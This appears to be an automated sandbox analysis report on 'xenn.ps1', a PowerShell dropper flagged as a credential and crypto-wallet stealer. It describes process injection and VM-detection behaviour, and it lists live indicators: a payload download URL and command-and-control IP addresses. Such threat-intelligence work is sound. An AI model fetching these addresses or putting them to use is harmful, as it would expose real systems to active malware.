windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645513 Sample: xenn.ps1 Startdate: 21/03/2025 Architecture: WINDOWS Score: 100 27 api.ip.sb.cdn.cloudflare.net 2->27 29 api.ip.sb 2->29 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 7 other signatures 2->43 9 powershell.exe 16 2->9         started        signatures3 process4 file5 25 C:\Users\user\AppData\...\VZCXGHSDSD.exe, PE32 9->25 dropped 49 Found many strings related to Crypto-Wallets (likely being stolen) 9->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 9->51 53 Powershell drops PE file 9->53 13 VZCXGHSDSD.exe 15 3 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 dnsIp8 35 176.65.144.3, 49722, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 13->35 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 13->57 59 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 13->59 61 Injects a PE file into a foreign processes 13->61 19 VZCXGHSDSD.exe 49 13->19         started        signatures9 process10 dnsIp11 31 176.65.144.135, 49723, 49725, 65012 PALTEL-ASPALTELAutonomousSystemPS Germany 19->31 33 api.ip.sb.cdn.cloudflare.net 104.26.13.31, 443, 49724 CLOUDFLARENETUS United States 19->33 45 Tries to harvest and steal browser information (history, passwords, etc) 19->45 47 Tries to steal Crypto Currency Wallets 19->47 23 conhost.exe 19->23         started        signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.26.13.31
 api.ip.sb.cdn.cloudflare.net United States
13335 CLOUDFLARENETUS false
176.65.144.3
 unknown Germany
12975 PALTEL-ASPALTELAutonomousSystemPS false
176.65.144.135
 unknown Germany
12975 PALTEL-ASPALTELAutonomousSystemPS true

Contacted Domains

Name IP Active
api.ip.sb.cdn.cloudflare.net 104.26.13.31 true
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://176.65.144.135:65012/ true
  • Avira URL Cloud: safe
 unknown
https://api.ip.sb/geoip false
    		high
    176.65.144.135:65012 true
    • Avira URL Cloud: safe
    		 unknown
    http://176.65.144.3/dev/xenbuild.exe false
    • Avira URL Cloud: safe
    		 unknown